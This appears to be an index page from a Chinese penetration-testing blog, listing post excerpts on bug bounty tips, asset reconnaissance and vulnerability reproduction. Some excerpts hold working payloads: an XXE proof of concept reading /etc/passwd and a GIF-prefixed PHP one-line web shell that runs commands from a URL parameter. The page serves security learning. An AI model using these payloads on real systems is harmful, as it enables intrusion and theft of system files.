最新发布第12页
xxe快速验证-渗透云记 - 专注于网络安全与技术分享

xxe快速验证

有回显,用以下poc直接读取/etc/passwd: <?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&am...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
010
信息收集之快速提取SSL证书里的域名-渗透云记 - 专注于网络安全与技术分享

信息收集之快速提取SSL证书里的域名

信息收集之快速提取SSL证书里的域名 echo '唯品会(原Vipshop.com)特卖会:品牌特卖_确保正品_确保低价_货到付款' | httpx -tls-probe -json -silent | jq .tls.dns_names #安全小天地Zone Tip...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
050
红蓝对抗之企业对外根域名资产收集-渗透云记 - 专注于网络安全与技术分享

红蓝对抗之企业对外根域名资产收集

#原创文章# 前言 上次听了火器的线上分享会议有提到火器的资产关联大概的思路,真的是收获了很多。再夸夸火器,在挖一些项目中的确能省掉很多资产收集的时间。本文主要参考上次会议中提交的一些...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
010
bugbounty技巧聚合20210810-渗透云记 - 专注于网络安全与技术分享

bugbounty技巧聚合20210810

漏洞报告 Mattermost #1216203 Mattermost Server OAuth Flow Cross-Site Scripting Kubernetes #1167773 Loading YAML in Java client can lead to command execution Nextcloud #1194606 Virt...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
000
QQ客户端xss【未修复】-渗透云记 - 专注于网络安全与技术分享

QQ客户端xss【未修复】

收藏url编码后的xss入门语句再编辑一下即可 别说你不会 文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
020
常见的swagger-ui路径-渗透云记 - 专注于网络安全与技术分享

常见的swagger-ui路径

/swagger/ /api/swagger/ /swagger/ui/ /api/swagger/ui/ /api/swagger-ui.html/ /swagger/ui/ /api/swagger/ui/ /api/swaggerui/ /swagger-resources/configuration/ui/ /libs/swaggerui/ /use...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
020
bugbounty技巧聚合20210813-渗透云记 - 专注于网络安全与技术分享

bugbounty技巧聚合20210813

漏洞报告 GitHub Security Lab [#1301752 C#]: HttpOnly and Secure Cookies for .NET Core and .NET #1301753 Java: Timing attacks while comparing results of cryptographic operations Ube...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
030
白帽训练营的简介-渗透云记 - 专注于网络安全与技术分享

白帽训练营的简介

白帽训练营,对Zone里面的文章进行主题分类,用于白帽子们的入门和提高。 文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
030
bugbounty技巧聚合20211009-渗透云记 - 专注于网络安全与技术分享

bugbounty技巧聚合20211009

漏洞报告 【Kubernetes 1000刀】用于 kube-apiserver cloudprovider 场景的 SSRF http://hackerone.com/reports/941178 挖洞技巧 1、浅谈云上攻防--SSRF漏洞带来的新威胁 http://mp.weixin.qq.c...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
010
安服仔日记系列——某教育局内网被打穿-渗透云记 - 专注于网络安全与技术分享

安服仔日记系列——某教育局内网被打穿

0x00 背景 “A ha ha ha ha ha,鸡汤来咯~”,只见老黑端上一锅鸡汤上来,说:“这这 这菜都齐了,怎么还不吃呀?”。 “老黑呀,这大伙儿都不敢吃”,二狗说到,“有人说,说是在公司有个内鬼...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
030
自用信息(资产)收集流程-渗透云记 - 专注于网络安全与技术分享

自用信息(资产)收集流程

资产收集 CDN判断以及绕过 因为cdn的存在会影响对真实ip的判断,所以第一步判断有无cdn(如果没有直接进入下一步,这里准备了几招)比较重要: 利用多节点请求的返回情况来判断 在线网站17ce 爱站...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
000
记挖到的一个支付漏洞-渗透云记 - 专注于网络安全与技术分享

记挖到的一个支付漏洞

欢迎大佬们继续补充 文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
000
挖掘后台api的未授权访问漏洞-渗透云记 - 专注于网络安全与技术分享

挖掘后台api的未授权访问漏洞

现在越来越多的网站前后端分离,javascript代码基本都会使用webpack这样的工具进行打包,打包过后的javascript代码会被混淆压缩,一个js文件就上万行代码,增加了读取javascript源码业务逻辑的...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
040
CVE-2022-23131_Zabbix登录绕过漏洞分析及复现-渗透云记 - 专注于网络安全与技术分享

CVE-2022-23131_Zabbix登录绕过漏洞分析及复现

前言 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 本文章中的漏洞均为公开的漏洞收集,如果文章中的漏洞出现敏感...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
010
大壮的信息源-渗透云记 - 专注于网络安全与技术分享

大壮的信息源

自学成才的黑客(安全研究员)是从哪学到那些知识的? http://www.zhihu.com/question/23073812/answer/23563575 正如上面的乎友所说:现在获取信息的渠道越来越多,每天新增的技术文章早已超出...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:34
060
无敏感函数的php一句话-渗透云记 - 专注于网络安全与技术分享

无敏感函数的php一句话

无敏感函数的php一句话(php中可用`来执行系统命令,相当于system、eval等函数),执行命令:shell.php?1=whoami Gif89a <?php $a = `$_GET[1]`; echo $a; ?> 文字来源于- 火线 Zone-云安全...
云记的头像-渗透云记 - 专注于网络安全与技术分享云记2022年3月10日 23:37
030
漏洞复现
漏洞复现,安全小天地的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
168篇文章更多文章
白帽黑客
白帽黑客网络用语中指站在黑客的立场攻击自己的系统以进行安全漏洞排查的程序员。他们用的是黑客(一般指“黑帽子黑客”)惯用的破坏攻击的方法,行的却是维护安全之事
273篇文章更多文章
渗透测试实战
在渗透测试项目中,外网的信息收集是至关重要的一个环节,外网打点信息收集全面了,可能会有四两拨千斤效果,直接突破外网边界进入内网。 子域名是域名信息收集的一个重要部分,在防御措施严密情况下我们无法直接拿下主域名,那么就可以采用迂回战术拿下子域名,然后无限靠近主域名。
22篇文章更多文章
2026年4月24日 17:11
2026年4月7日 21:49
2026年2月13日 12:53